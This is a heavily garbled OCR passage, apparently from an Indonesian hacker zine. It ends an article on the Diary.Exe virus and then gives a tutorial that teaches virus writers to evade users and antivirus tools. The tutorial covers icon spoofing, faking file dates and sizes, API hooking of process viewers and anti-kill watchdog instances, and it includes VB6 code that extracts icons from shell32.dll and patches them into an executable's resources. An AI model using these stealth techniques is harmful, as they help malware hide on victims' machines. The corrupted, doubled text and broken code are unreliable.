m 0xf f f f%fesp) f e4(, % ebp)) , %eax l ov ea 0x1b( %ebp edx and and $0 $0xf xf f f f f f f 0, %edx edx l ea ( %eax, %edx, 1) , %edi cmp %esi , %edi je 0x5f eacc cl d mov 0xf f f f f f ec( %ebp ebp)) , %ecx mov %edx, %edi shl $0x2, %ecx shr $0x2, %ecx r epz movsl %ds: ( %esi ) , %es: ( %edi ) mov %edx, %es esii j mp 0x5f ea58 cl d mov 0xf f f f f f ec( %ebp ebp)) , %ecx mov %edx, %edi shl $0x2, %ecx shr $0x2, %ecx r epz movsl %ds: ( %esi ) , %es: ( %edi ) mov %edx, %es esii mov 0xf f f f f f e4 e4(( %ebp) ebp) , %edi edi mov 0xf f f f f f ec( %ebp) ebp) , %eax eax add %eax, %edi mov %edi edi , 0xf f f f f f f 0( %ebp) ebp) j mp 0x5f ea58 nop nop nop nop Exi t anyway? ( y or n) y
nah puyeng kan loe ... yang di atas itu apaan?? sama gue juga puyeng ... tapi jangan menyerah keep moving lolz [ dok oktt er@l oca ocall ho host st f ed edora] ora] $
execll +0> 0>atau execll +1> 1>karna alasan nya kita tidak punya alamat dari Sebagai Virus pasti Diary.Exe juga memerlukan suatu method Autorun saat komputer Boot. Virus ini menggunakan key di HKLM\Software\Microsoft\Windows\CurrentVersion\Run dengan value NvsSchd dan berisi data %Program Files%\Comm Files%\Common on Files\System\Explorer.exe. >Karena ketidaksempurnaan dalam penulisan program, maka virus ini hanya dapat berjalan di sistem operasi Windows XP, 2000 atau ata u 2003. Virus ini berukuran sekitar 60 Kb dan yang telah dikompres dikompresii berukuran 20 Kb Kb dengan menggunakan kompresi UPX. $API Functions List... >GetSystemDirectory GetWindowText GetDesktopWindow GetTopWindow CloseWindow GetWindowText GetForegroundWindow FindWindow SendMessage $Advantages N Disadvantages... >Virus berukuran cukup kecil >Selain mem-blok akses, juga me-minimize window-window >Virus tidak dapat berjalan di Windows 9x dan Me >Teknik search file masih menggunakan FSO dan WSH >Menghapus file korban
55
$End... >Diary.Exe dapat dikatakan salah satu virus lokal berbahaya karena menghapus file-file MS-Word di Komputer yang terinfeksi. Penyebaran virus ini masih rendah, Media penyebarannya melalui Disket dan USB Drive. Teknik searching file .Doc menggunakan teknik file scripting object. Dan implementasi Key Registry menggunakan teknik Windows Scripting. Demikian artikel sederhana ini, kurang atau lebihnya saya mohon maaf....
Greetz... Myztx @ Myztx Soft. House. All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack n the others. Spyro, Vaganci, Yanto, n All my Friends at 01 [2005] n 07 [2004]. Contact... Saran, Kritik, Caci-maki, Dll diharapkan dan ditujukan pada alamat email :
[email protected] [email protected] Author... >Pshv also known as PHmv :D
56
Implementasi Teknik Stealth Pada Virus
$> A little Words... Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk). $> Start... Mungkin sebagian (Atau seluruhnya) Vx3r (Pembuat Virus) pasti menemukan suatu permasalahan dalam membuat Virusnya agar susah dihapus atau meminimalisir meminimali sir pendeteksian oleh User ataupun Anti Virus. Bagaimana sih cara-cara Vx3r itu menyembunyikan Virusnya di komputer korban? Ada beberapa cara yang klasik dan sangat sering dilakukan, Seperti: 1. Merubah nama File Virus menjadi (mirip) File system Windows, contoh RunDll32.exe, Winsys32.exe,dll 2. Menempatkan File Virus di Folder Hidden atau di Folder System Windows. 3. Menghalangi Akses ke Task Manager maupun Tool-tool yang dapat menampilkan proses yang sedang berlangsung. Hal ini llumrah umrah karena virus ingin eksistensinya dipertahankan. 4. Menggunakan nama file yang random atau acak. 5. Menggunakan Ikon yang umum seperti MS-Word, Folder, Setup program, dll. 6. Memblok fasilitas Search. 7. Dan lainnya. Lalu apa saja kelemahanny kelemahannya? a? Untuk penggunaan Ikon yang umum hal ini sangat fatal, karena User dapat membedakan antara ikon Default File *.Exe dengan ikon yang dipakai oleh Virus. Sebagai contoh apabila si Virus memakai Ikon MSWord maka akan terjadi suatu kejanggalan, "Ikonnya Word kok ekstensinya Exe?".
57
Contoh lagi kasus penggunaan nama file random atau acak. Pada hal ini diperlukan suatu suatu penyim penyimpanan panan dari nama fi file le acak itu itu,, karena pada Trigger Virus jalan dia akan mencari file yang dimaksud. Pemyimpanan nya pun berupa file ataupun key di registry. Kedua teknik penyimpanan tersebut sama baiknya apabila dilengkapi oleh teknik Enkripsi. Pada suatu Virus yang pernah saya temukan dan analisa, Kangen.E telah menggunakan nama acak dan penyimpanan di suatu file *.sys. Dan file tersebut dibiarkan apa adanya tanpa perlindungan apapun terhadap isinya. Hal ini memudahkan dalam melacak nama trigger virus tsb. Sebenarnya langkah apa yang harus diambil agar virus kita tak mudah terlacak oleh User? Menurut pandangan saya ada beberapa poin yang sangat penting: 1. Lakukan teknik penggantian Ikon secara langsung (Ekstrak dan ganti), bukan mengandalkan ikon default. 2. Penggantian Filetime maupun FileDate dan ukuran pada file Virus agar tidak mudah ditemukan dengan Search. 3. Gunakan API-Hook dalam melacak tool Proses Viewer, jangan mengandalkan windows Caption karena sudah banyak tool yang tidak memakai window caption lagi. 4. Jika memungkinkan jangan me-launch instan virus dengan cara "shell", karena hal ini dapat berakibat Proses Virus menjadi Parent and Child. Bila sang parent mati maka si child pun akan ikut mati. 5. Selalu gunakan instan virus lain untuk saling melacak keberadaan virus (AntiKill process) sehingga virus memungk memungkinkan inkan untuk tetap eksis. $> How to...? Saya menggunakan Bahasa Pemograman Visual Basic 6.0 dalam mencoba teknik stealth (yang menurut saya) agak baik Serta beberapa referensi Source Code maupun artikel Teknik ini jugadari sayaInternet. coba pada Virus Diary.Exe (V 1.3-1.5) dengan beberapa perubahan. 1. Penggantian ikon Jika anda pernah menemuk menemukan an suatu software pengekstrak atau pengganti ikon (bahkan keduanya) suatu file, maka kurang lebih hal ini bisa juga diimplementasikan diimplementasik an di Virus :D. Contoh algoritmanya : START EXECUTI ON | Cop opy y mysel f . ex exe e t o dest dest i na natt i on pa patt h |
58
Sea earr ch f i l e ya yan ng a aka kan n d dii ek ekst st r ak i ko konn nnya ya | Ekst r ak i kon konnya ya,, sav save e to desti desti nati on pa patt h | Chang ange myse ysell f . ex exe e d den enga gan n f i l e i ko kon n ( *. I co) yang yan g suda sudah h d dii ekst r ak | Hap apus us Fi Fi l e i kon apab apabii l a su suda dah h ti da dak k d dii gu guna nakan kan | END EXECUTI EXECUTI ON
Saya menggunakan file Shell32.Dll sebagai file yang akan diekstrak Ikonnya, dalam hal ini saya akan memilih ikon Default file *.exe (yang berwarna kotak putih-biru :P). Kira-kira begini source codenya : (Diperlukan Objek PictureBox dalam Form) ------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Sub ca carr i i kon kon( pat hcar car i As S Stt r i ng, pathe athekstr kstr ak A As s St St r i ng, j eni si ko kon n As S Stt r i ng, pi c2 As Pi ct ur eBox) Di m po poii n A As s Long Long poi n = 1 Di m i As Lon Long g Di m bu buff ( 10 1000 00)) As D Dou oubl bl e Di m j um As I nt eger j um = 0 Di m j i kon kon As Lo Long ng j i kon = 0 Di m i ni t A As s St St r i ng i ni t = Chr$( 0) & Chr$( 0) & Chr$( 1) & Chr$( 0) & Chr$( 1) & Chr$( 0) & Chr$( 32) 32) & Chr$( 32) 32) & Chr $( 0) & Chr$( 0) & Chr $( 0) & Chr $( 0) & Chr$( 0) & Chr $( 0) & Chr $( 168) 168) & Chr $( 8) & Chr $( 0) & Chr $( 0) & Chr $( 22 22)) & Chr$( 0) & Chr $( 0) & Chr $( 0) Di m st r baca As S Stt r i ng st r ba baca ca = Sp Space ace(( 2238 2238)) Di m new fiw l _di dat cA As sA SStr t r i inn gg ne As s St Di m r s A As s St St ri ng r s = Chr $( 0) & Chr$( 0) & Chr $( 0) & " " & Chr $( 0) & Chr $( 0) & Chr $( 0) & " @" Di m buf buf f As D Dou oubl bl e buf f = 1024 ^ 2 Ope pen n pat pat hcari For Bi nar nar y A As s #1 #1 I f LOF(1) > buf f Then f i l dat = Spac e e(( b u uff f ) El se f i l dat = Space ce(( L OF (1 (1)) ) End I f bal i k : I f poi n > LOF(1) Then GoT oTo o t ul i s End I f Get #1, poi n, f i l dat i = 1 c ar i l agi : DoEvent s
59
i = I nSt r ( i + 1, f i l dat , " ( " & r s s)) I f i > 0 Then ' l s t. Add "#" & l s t. Count & "#", i + poi n - 1 buf ( j um) = i + poi n - 1 j um = j um + 1 End I f I f i + L en en( r s ) > buf f Or i = 0 Then poi n = poi n + buf f - L e en n( " ( " & r s ) - 1 GoT oTo o bal bal i k El se GoTo ca carr i l agi agi End I f tu ull i s : Cl ose Ope pen n pat pat hcari For Bi nar nar y A As s #1 #1 Fo orr poi n = 0 To j um - 1 DoEvent s I f Ri ght ( pathe athekstr kstr ak, ak, 1) < > "\ " Th Then en pathe athekst kst r ak = pathe athekst kst r ak & "\ " End I f I f poi n j en enii si kon kon Then Then GoT oTo o l sg Ope pen n pat pat he hekst kst r ak & " I kon kon.. i co" For Out pu putt As #2: Cl ose #2 Ope pen n pat pat he hekst kst r ak & "I kon kon.. i co" For Bi na narr y A As s # #2 2 ' i = l s t. I t em( "# "#"" & poi n & "#") i = buf ( p o oii n) G ett # #1 1, 1, i , istnir tbaca Pu Put #2, & st r ba baca ca & Chr$( 25 255) 5) Cl ose #2 I f i ko kon n( pat hekst kst rak & "I kon kon. i co co", ", pi c2) c2) = 0 T Th hen Ki l l pat heks kstt r ak & "I ko kon n. i co" co" End I f DoEvent s l sg: sg: Next po poii n Cl ose #1 Cl ose End Sub sub sub i kon kon( path A As s Str i ng, pi c A As s Pi ct ur eBox ox)) On E Err r or GoTo e err o pi c. Pi cture = L oa oadPi cture(p cture(pa at h) i ko kon n =1 Exi t Fun Functi on ero: i ko kon n =0 Exi t Fun Functi on En End d Fun Funct ct i on
------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Prosedur cariikon akan mencari file yang akan diekstrak ikonnya berdasarkan index ikon tersebut. Ikon yang akan dihasilkan masih berukuran 16X16, tetapi hal itu sudah cukup untuk mengelabui User. Perlu diingat bahwa index ikon file *.Exe dalam shell32.Dll untuk tiap versi Windows adalah berbeda. Terutama untuk Windows 9x dan Windows 2k/2003/XP/NT. Lalu bagaimana kita menukar atau change ikon virus kita dengan file ikon yang sudah diekstrak tsb? (Referensi Source Code dari Internet, Author :Naveed, neenojee@ho
[email protected]) tmail.com)
60
1st. Module: ------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Opt i on Expl i ci t Type DI B_H B_HEA EAD DER Si ze As Wi dt h As Hei gh ghtt As Pl an anes es As Bi t co cou unt As Reser ved As I mageSi ageSi ze As End Type
Lon Long g Long Lon Long g I nt eg eger er I nt eger eger Long Long
Type I CON_ DI R_ EN ENTR TRY Y bWi dt h bHei gh ghtt bC bCol ol or Cou ount nt bR bReser eser ved wPl an anes es wBi t Cou ount nt dwByt esI nRes nRes dwI mageO ageOf f set End Type
As As As As As As As As
Type I CON_ DI R Rese eserr ved ved Type Cou ount nt End Type
As I ntege ntegerr As I nt eger As I ntege ntegerr
Type DI B_BI TS Bi t s( ) End Type
As Byte
Byt e Byt e Byt e Byt e I ntege ntegerr I nteger nteger Long Long
Publ i c E En num Er r ors FI LE_CR LE_CREA EATE_FAI TE_FAI LED = 1000 1000 FI LE_RE LE_READ AD_F AI LED I NVA VALI LI D_ PE_SI GNATURE I NVALI D_I CO NO_ RESO RESOUR URCE_ CE_TREE TREE NO_ I CON_ N_BRAN BRANCH CH CANT_ CAN T_ HA HACK_ CK_HEAD HEADERS End Enum Pu Publ bl i c Fu Fun nct i on Rep epll ace aceII cons(So cons(Sou ur ce A As s Str i ng, ng, Dest As Str i ng ng)) As Lon Long g Di m I coD coDi r As I CON_D _DII R Di m I coDi r Ent Ent r y As I CON_DI _DI R_EN _ENTR TRY Y Dii D Di Di Di Di Di
m It co Bi n t s( s )A As sA DI DI IBcon _BI _Bn ID Tes S cri pt or m con As s co escri m l ng ngR Ret As Lon Long g m By Bytt esRe esRead ad As Long m hS hSou ourr ce A As s Long m hDest As Long m ResTr ee A As s Long
hS hSou ourr ce = Cr ea eatt eFi l e( Source, Source, ByVal yVal &H80 8000 0000 0000 00,, 0, ByV yVal al 0&, 3, 0, ByV yVal al 0) I f hSou hSourr ce >= 0 T The hen n I f Val i d_I CO( hSour our ce) ce) Then Then SetFi l eP ePo oi nt er h hS Sour our ce, ce, 0, 0, 0 Rea eadF dFii l e hS hSou ourr ce, I coDi r , 6, Byt esR esRea ead, d, ByVal yVal 0& Rea eadF dFii l e hS hSou ourr ce, I coDi r Ent Ent r y, 16 16,, Byt esR esRea ead, d, ByV ByVal al 0& SetFi l eP ePo oi nt er hSour our ce, ce, I coD coDi r Ent r y. dwI mageOf f se sett , 0, 0 ReDi m t Bi t s. Bi t s( I coD coDi r Ent r y. dwBytesI nRes es)) As B Byte yte Rea ead dFi l e hSou hSourr ce, t Bi t s. Bi t s( 0) , I coDi r En Entt r y. dwBytesI nRes, nRes, By Bytt esR esRea ead d, ByV yVal al 0& Cl oseHandl andl e hS hSou ourr ce hDest = Cr eat eat eFi l e( Dest , ByV yVal al ( &H80 8000 0000 0000 00 Or &H4000 400000 0000 00)) , 0, ByV yVal al 0&, 3, 0, ByVal yVal 0) I f hDest >= 0 T The hen n I f Val i d_PE _PE(( hDest est ) Then ResT esTrr ee = Get ResT esTrr ee eeO Of f set ( hDest )
61
If R ResT esTrr ee > 308 Then Then ' Sani ani t y check check l ngRet = Get I co con nOf f set set s( hDest , ResTr sTr ee, I co con ns) Set F i l ePoi nt er hDes t, I con cons (1). Of f s e ett , 0, 0 Wr i t eFi l e hDest , t Bi t s. Bi t s( 0) , UBound( t Bi t s. Bi t s) , BytesR ytesRe ead, ByV yVa al 0& El s e Cl oseHan oseHandl dl e hDest End I f El s e Cl oseHandl andl e hDest End I f Cl oseHandl andl e hDest El se End I f El se Cl oseHandl andl e hS hSou ourr ce End I f El se End I f Rep epll aceI aceI cons cons = 0 Exi t Fun Functi on En End d Fun Funct ct i on Pu Publ bl i c Fu Fun nct i on Val i d_I CO( hfi l e As Long Long)) As B Boo ooll ea ean n Di m t Di r As I CON_DI _DI R Di m By Bytt esRe esRead ad As Long I f ( h f i l e > 0) T h he en Rea ead dFi l e hf i l e, t Di r , Le Len n( t Di r ) , BytesR ytesRea ead d, ByV yVal al 0& I f ( t Di r . Reser ser ve ved d = 0) An And d ( t Di r . Typ ype e = 1) An And d ( t Di r . Count > 0) Th The en Val i d_I CO = True El se all s e EndVIafl i d_I CO = F a El se Val i d_I CO = F a all s e End I f En End d Fun Funct ct i on
------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------2nd. Module ------------------------------------------------Cut --------Cut Here & Start Copy-Paste from Here----------------Here---------------------------------Opt i on Expl i Publ i c Type Mag agii c cbl cbl p cp crl c cparhd cparhdrr
ci t I MAGE_D E_ DOS_H S_ HEADER As I ntege ntegerr As I nt eg eger er As I nt eg eger er As I nt eger As I nt eg eger er
mi nal l oc max axal al l oc ss sp csum csu m ip cs l f ar l c ov ovno no r es( es( 3) oemi d oe oem mi nf o r es2 es2( 9) l f anew anew End Type
As As As As As As As As As As As As As
I nt eg eger er I ntege ntegerr I nt eg eger er I nt eg eger er I nt eg eger er I nt ege eger I nt eg eger er I nt e g ge er I ntege ntegerr I nt ege eger I nt eger eger I ntege ntegerr I nt ege eger As Long
Publ i c Type I MAGE_FI LE_HE Publ LE_HEA ADER Machi ne As I nt eg eger er Numbe berr Of Se Sect ct i ons ons As I nt eg eger er Ti eD am As PoimeDat nt at er eSt ToS ToSym ymp bo boll Tab Tabll e A As s Long Lon Long g Number Of Symbol s As Long
62
Si zeOf Ot i on onal al Hea ead der Char ac actt eri st i cs End Type
As I nt eg eger er As I nt eger
Publ i c Type I MAGE_DA E_DATA_D TA_DII REC ECTO TOR RY Dat aRVA aRVA As Long Dat aSi aSi ze As Lon Long g End Type Publ i c Type I MAGE_O E_OPTI PTI ONAL_HE AL_HEAD ADER Mag agii c As I nteger nteger Maj orLi nk nkV Ver As Byt e Mi no norr Li nk nkV Ver As Byt e Code odeSi Si ze As Long I ni t DataS ataSii ze As Lo Long ng un unII ni t Dat aS aSii ze As Lon Long g En Entt r yPoi yPoi nt As Lon Long g CodeBase CodeB ase As Long Dat aBa aBase se As Long I mageBase As Long Se Sect ct i onA onAl i gn gnm ment ent As Lon Long g Fi l eA eAll i gn gnm men entt As Lon Long g Maj or OSV SVer er As I nt eger eger Mi no norr OSV SVer er As I nt eger eger Maj or I mag ageV eVer er As I nt eger eger Mi no norr I mag ageV eVer er As I nt eger eger Maj orSSV orSSVer er As I ntege ntegerr Mi no norr SS SSV Ver As I nteger nteger Wi n32Ver n32Ver As Long IHm ageSi age ead eader erSiSize ze Checksum Subsystem ubsystem DLLC LLCha harr s St ackRes ackRes St ackCommi t HeapR eapReser eser ve HeapCommi t Loader Load er Fl ags ags RVA VAsAndSi sAndSi zes Dat aEnt aEnt r i es( 15) End Type
As As As As As As As As As As As As
Long Long Long I nt eg eger er I nt eger eger Long Long Long Lon Long g Lon Long g Long I MAGE_D E_DA ATA TA__ DI REC ECTO TORY
Publ i c Type I MAGE_SECTI ON_ HEA EAD DER Sect i onName( 7) As Byt e Addres s As Long Vi r t ua uall Add ddrr ess As Lon Long g Si zeO zeOff Dat a As Lon Long g PDat PDat a As Long PR PRel el oc As Long PLi neN neNum ums As Long Rel ocC ocCou ount nt As I ntege ntegerr Li ne neC Cou ount nt As I nteger nteger Char har acter i st i cs As Lo Long ng End Type Type I MAGE_RESOURCE_DI R Char har acter i st i cs As Ti meSt amp As Maj orV orVersi ersi on As Mi norVersi orVersi on As NamedEn edEntt r i es As I DEnt r i es As End Type
Lo Long ng Long I nt eg eger er I nt eg eger er I nt eger eger I nt eger
Type RESOURCE_DI RCE_DI R_ EN ENTR TRY Y Name As Lo Long ng Of f set As Lon Long g End Type Type RESOURCE_DA RCE_DATA TA__ EN ENTR TRY Y
63
Of f set Si ze CodePage Reser ved End Type Pu Publ bl i c T Typ ype e ID Of f set Si ze End Type
As As As As
Lon Long g Lon Long g Long Long
I con conD Descri pt or As Long As Lon Long g As Lon Long g
Pu Publ bl i c D Decl ecl are Sub Cop opyM yMemory Li b "ker ne nell 32" 32" Al i as " Rt l Mov oveM eMemory" ( Dest i na natt i on As As Any, Any, So Sour ur ce As A Any ny,, ByV yVal al Leng Lengtt h A As s Long) Publ i c D De ecl ar e Fu Fun nct i on Cr eat eat eFi eFi l e Li b "ke "kerr nel 32" Al i as "C "Crr ea eatt eF eFii l eA" ( ByV yVa al l pFi l eName As St r i ng ng,, ByV yVal al dwDesi r ed edA Access As As Long Long,, ByVal yVal dwSh ShareM areMod ode e A As s Long, Long, l pS pSecu ecurr i t yA yAtt t r i bu butt es As An Any, y, ByVal yVal dwCr ea eatt i on onD Di spo sposi si t i on As Lon Long, g, ByV yVal al dwFl ag agsA sAnd ndA At t r i bu butt es As As Long, Long, ByV yVal al hT hTem empl at eFi l e A As s Long) Long) As Long Publ i c D De ecl ar e Fu Fun nct i on ReadFi adFi l e Li b "ke "kerr nel 32" ( ByV yVa al hf i l e A As s Long Long, l pBuf f er As A An ny, ByVal yVal nNum nNumber Of By Bytt esToR esToRead ead A As s Long Long,, l pN pNum umber Of Byt esRe esRead ad A As s L ong ong,, l pOver l app apped ed As As Any) As Long Publ i c D De ecl ar e F Fu unct i on Wr i t eFi l e L Lii b "k "kern ernel el 32" ( ByV yVal al hf i l e As As Lon Long, l pBuf f er As A An ny, ByV yVal al nN nNum umbe berr Of Byt esToWr i t e As Long Long,, l pNumbe berr Of Byt esWr i t t en A As s Lon Long, g, l pOverl appe apped d A As s Any) As Long Publ i c D De ecl ar e F Fu unct i on Set Fi l ePoi nt er Li b "ke "kerr nel 32" ( ByVa yVal hf i l e A As s Lon Long, ByV yVa al l Di st anceT anceToM oMove A As s Long, l pDi st anceTo anceToM MoveHi gh A As s Long, ByVal yVal dwMoveMet hod As Long) As Long Pu Publ bl i c D Decl ecl are Fu Functi ncti on Cl ose oseH Han andl dl e Li b " ke kerr ne nell 32 32"" ( ByV yVal al hObj ect As Lon Long) g) As Lo Long ng Pri vat Sect i on onA l imgnm gn ent A s Lo Lon Long g Pri va vattt e va e Se Fi ct l eA eAl liA gn gnm ent enm t ent As Long ng Pr i vat e ResSe esSect ct i onR onRVA As Lon Long g Pri va vatt e ResS esSect ect i on onO Of f set As Lon Long g Pu Publ bl i c Fu Fun nct i on Val i d_PE _PE(( hf i l e As Lo Lon ng) A As s B Boo ooll ea ean n Di m Buf f er ( 12) Di m l ng ngB Byt esR esRea ead d Di m t Dos osH Header
As Byte As Lon Long g As I MAGE_D E_ DOS_H S_ HEADER
I f ( h f i l e > 0) T h he en Rea eadF dFii l e h hff i l e, t DosH osHea eade derr , ByVal yVal Len Len(( t DosH osHea eade derr ) , l ng ngB Byt esR esRea ead, d, ByV yVal al 0& CopyM opyMemor y B Buf uf f er ( 0) , t DosH osHead eader er . Magi agi c, 2 I f ( Chr( Buf f er( 0) ) & Chr ( Buf f er( 1) ) = "MZ") Then Set F i l ePoi nt er hf i l e, t Dos H He eader . l f anew, 0, 0 Read eadFi l e h hff i l e, Buf f er( 0) , 4, l ngBytesR ytesRea ead d, ByV yVal al 0& I f ( Chr ( Buf f er( 0) ) = "P ") A An nd ( Chr( Buf f er( 1) ) = "E "E") ") And ( Buf f er( 2) = 0) A An nd ( Buf f er( 3) = 0) Then Val i d_PE = Tru True e Exi t Fu Fun nct i on End I f End I f End I f Val i d_P _PE E = Fa all s e En End d Fun Funct ct i on Pu Publ bl i c Fu Fun nct i on GetR etResT esTrr eeO eeOf f set( hf i l e A As s Lon Long) g) As Lo Long ng On E Err r or GoT oTo o E Err r Han andl dl er: Di Di Di Di Di Di Di
m t Dos m t Fi l e m t Opt i ona onall m t Sect i ons( ) m By Bytt esRe esRead ad m i nt C m Tr eeF eeFou ound nd
As As As As As As As
I MAGE_D E_ DOS_H S_ HEADER I MAGE_FI LE_HEA LE_HEAD DER I MAGE_O E_OPTI PTI ONAL_ HEAD EADER I MAGE_SEC E_SECTI TI ON_ HEA EAD DER Long I nt eger Bool ean
Tr eeFound = Fal se I f ( h f i l e > 0) T h he en Set F i l ePoi nt e r h hff i l e, 0, 0, 0 ' Get t he off set of t he I mag age e F Fii l e Hea ead der
64
Rea ead dFi l e h hff i l e, t Dos, Le Len n( t Dos), BytesR ytesRea ead d, ByV yVal al 0& Set F i l ePoi nt er hf i l e, By Va Val t Dos . l f anew + 4, 0, 0 ' Get t he I mage age Fi l e H Head eader er and and t he I mage age Opt i on onal al Head eader er ReadF i l e h hff i l e, t F i l e, L e en n( t F i l e) , Byt es R Re ead, By Va Val 0& Rea ead dFi l e h hff i l e, t Opt i onal , Len Len( t Opt i onal ) , BytesR ytesRe ead ad,, ByV yVa al 0& ' Get sect i on hea eade derr s ReDi m t Se Sect ct i ons( ons( t Fi l e. Numbe berr Of Se Sect ct i ons ons - 1) As I MAGE_SE E_SEC CTI ON_HEA _HEAD DER ReadF i l e h hff i l e, t Secti ons (0), L e en n( t Secti ons (0)) * t F i l e. Number Of Secti ons , Byt esRead, esRead, ByVal yVal 0& ' Make sur sur e t her e i s a r esou sour ce t r ee i n t hi s f i l e I f ( t Opt i onal . Dat aEnt ri es (2). Dat aSi ze ze)) Then ' Sav ave e se sect ct i on al i gnment ent and and f i l e a all i gnmen entt of i mag age e Secti onA onAl i gnment ent = t Opt i onal onal . Secti onA onAl i gn gnm men entt F i l eAl i gnment = t Opt i onal . F i l eAl i gnment ' Deter mi ne whi ch se sect ct i on contai contai ns t he r eso esou ur ce tr ee For For i nt C = 0 T To o U UB Bound ound(( t Secti ons) ons) I f ( t Secti ons (i nt C) . Vi r t ual Addres s < t Opti on onal al . DataE ataEntr ntr i es(2) . DataR ataRV VA) Then Then Tr eeFound = Tr ue ' Save ave R RV VA and and o off f set set of r esou sour ce s se ect i on for f ut ur e ca call cu cull at i ons ResSe sSect i on onR RVA = t Sect i ons( ons( i nt C) . Vi r t ual Addr ess ResSe sSect i on onO Of f set set = t Sect i on ons( s( i nt C) . PDat a ' Cal cul cul at e th the e p ph hys i cal cal f i l e o off f s e ett of t he r es o ou uce t ree Get ResTr sTr ee eeO Of f set set = t Sect i on ons( s( i nt C) . PDat a + ( t Opt i onal . Dat aEnt r i es( 2) . Dat aRV aRVA - tSe tSect ct i ons( i nt C) . Vi r t ual Addr ess) Exi t F o orr End I f Nex extt i ntC If G NetRe ot TrsTreeO eeF eeFou ound Then Then etResTree Ond f f set = -1 End I f El se GetR etResT esTrr ee eeO Of f set = - 1 End I f El se GetR etResT esTrr ee eeO Of f set = - 1 End I f Exi t Fun Functi on Er r Hand andl er : En End d Fun Funct ct i on Publ i c Fu Fun nct i on Get I con conOf f set set s( hf i l e A As s Lon Long, Tr ee eeO Of f se sett As Lo Lon ng, I co con ns( ) As I con conD Descri ptor ) As Lon Long g On E Err r or GoT oTo o E Err r Han andl dl er: Di Di Di Di Di Di Di Di Di Di Di Di Di Di
m Root m L1 L1E Entr i es() m L2R L2Roo oott ( ) m L2 L2E Entr i es() m L3R L3Roo oott ( ) m L3 L3E Entr i es() m Dat aE aEnt nt r i es( ) m DI B m i L vl vl 1 m i Lvl Lvl 2 m i L vl vl 3 m Cur sor sor m BytesR ytesRea ead d m Cou ount nt
As As As As As As As As As As As As As As
I MAGE_RE E_RESO SOURCE_D E_DII R RESOURCE_D _DII R_EN _ENTR TRY Y I MAGE_R E_RES ESO OURCE_D E_DII R RESOURCE_D _DII R_EN _ENTR TRY Y I MAGE_R E_RES ESO OURCE_D E_DII R RESOURCE_D _DII R_EN _ENTR TRY Y RES ESO OURCE_D E_DA ATA_EN TA_ENTR TRY Y DI B_HEA _HEAD DER I nt eger I nt eger I nt eger Lon Long Lo Long ng I nteger nteger
' ' ' ' ' ' ' ' ' ' ' ' ' '
Root nod node e of r esour ce t r ee 1st l ev evel el of di r ector y en entt r i es Lev Level el 2 r eso esource urce di r ect ori es 2nd l ev evel el of di r ector y en entt r i es Lev Level el 3 r eso esource urce di r ect ori es 3r d l ev evel el of di r ector y en entt r i es R Resou esourr ce da datt a en entt r i es Descr i ptor f or i con i mages ages L oo oop Count er ( f i rs t l evel ) Lo Loo op Cou oun nt er ( se seco con nd l eve vell ) L oo oop Count er ( t hi r d l evel ) Temp va vall f or se sett t i ng f i l e poi nt er Fo Forr Rea ead dFi l e() Numbe berr of i con cons s f ou ound nd
I f ( h f i l e > 0) T h he en Cou ount nt = 0 Set F i l ePoi nt er hf i l e, By Va Val Tree reeO Of f s e ett , 0, 0 ' Get t he r oo oott no node de an and d be begi gi n na navi vi ga gatt i ng t he r eso esource urce t r ee Rea ead dFi l e hfi l e, Root oot , Le Len n( Roo oott ) , BytesR ytesRea ead d, ByV yVal al 0 ReDi m L2R L2Root( oot( Root. NamedEn edEntt r i es + Root. I DEn Entt r i es) As I MAGE_R E_RES ESO OURCE_D E_DII R ReDi m L1E L1Entr ntr i es( Roo oott . Named edEn Entt r i es + Roo oott . I DEn Entt r i es) As RES ESO OURCE_D E_DII R_EN _ENTR TRY Y ' Get f i r s t l evel c hi hi l d nodes For For i Lvl Lvl 1 = 1 T To o (Ro (Root. Named edE Ent r i es + Root oot . I DEnt r i es es))
65
Set F i l ePoi nt e r h hff i l e, Tr e e eO Of f s e ett + 8 + ( i L v vll 1 * 8 8)) , 0, 0 Read eadFi l e hf i l e, L1E L1Ent r i es es(( i Lvl Lvl 1) , 8, BytesR ytesRe ead, ad, ByV yVa al 0& I f L1 L1E Ent r i es( i Lvl Lvl 1) . Name = 3 T Th hen ' J ump t o l evel evel 2 and and ge gett di r ec ectt ory ' St r i p hi gh- or d e err byt e f r o m o f f s et et CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cur sor sor = Cur sor sor + Tr ee eeO Of f set set Set F i l ePoi nt er hf i l e, ByVal Curs or, 0, 0 Rea ead dFi l e h hff i l e, L2 L2R Root( i Lvl Lvl 1) , 16, BytesR ytesRea ead d, ByV yVa al 0& ReDi m L3R L3Root oot ( L2R L2Root( i Lvl Lvl 1) . NamedEnt r i es + L2R L2Root ( i Lv Lvll 1) . I DEnt r i es es)) As I MAGE_ RESOURCE_DI URCE_DI R ReDi m L2E L2Ent r i es( L2 L2R Root( i Lvl Lvl 1) . I DEnt r i es + L2R L2Root ( i Lv Lvll 1) . NamedEnt r i es es)) As RESOURCE_DI URCE_DI R_ENTRY Fo orr i L v vll 2 = 1 T To o ( L2 2R Root ( i L v vll 1) . I DEnt ri es + L 2R 2Root ( i L vl vl 1) . NamedEnt r i es ) ' Rea ead d seco second nd l ev evel el chi l d node nodes s CopyM opyMemory C Cu ur sor, L1 L1E Entr i es(i Lvl 1). Of f set, 3 Cur sor sor = Cur sor sor + Tr eeOf f set set Set F i l ePoi nt e r h hff i l e, Cur s o orr + 8 + ( i L vl 2 * 8 8)) , 0, 0 ReadFi l e hf i l e, L2E L2Ent r i es( i Lvl Lvl 2) , 8, BytesR ytesRe ead ad,, ByV yVa al 0& ' J ump t o l ev evel el 3 and and get get di r ector y CopyM opyMemory C Cu ur sor, L2 L2E Entr i es(i Lvl 2). Of f set, 3 Cur sor sor = Cur sor sor + Tr eeOf f set set Set F i l ePoi nt er hf i l e, ByVal Cur s o orr , 0, 0 ReadFi l e h hff i l e, L3R L3Roo oott ( i Lv Lvll 2) , 16, BytesR ytesRea ead d, ByV yVal al 0& ReDi m L3 L3E Ent r i es( L3R L3Roo oott ( i Lv Lvll 2) . Named edE Ent 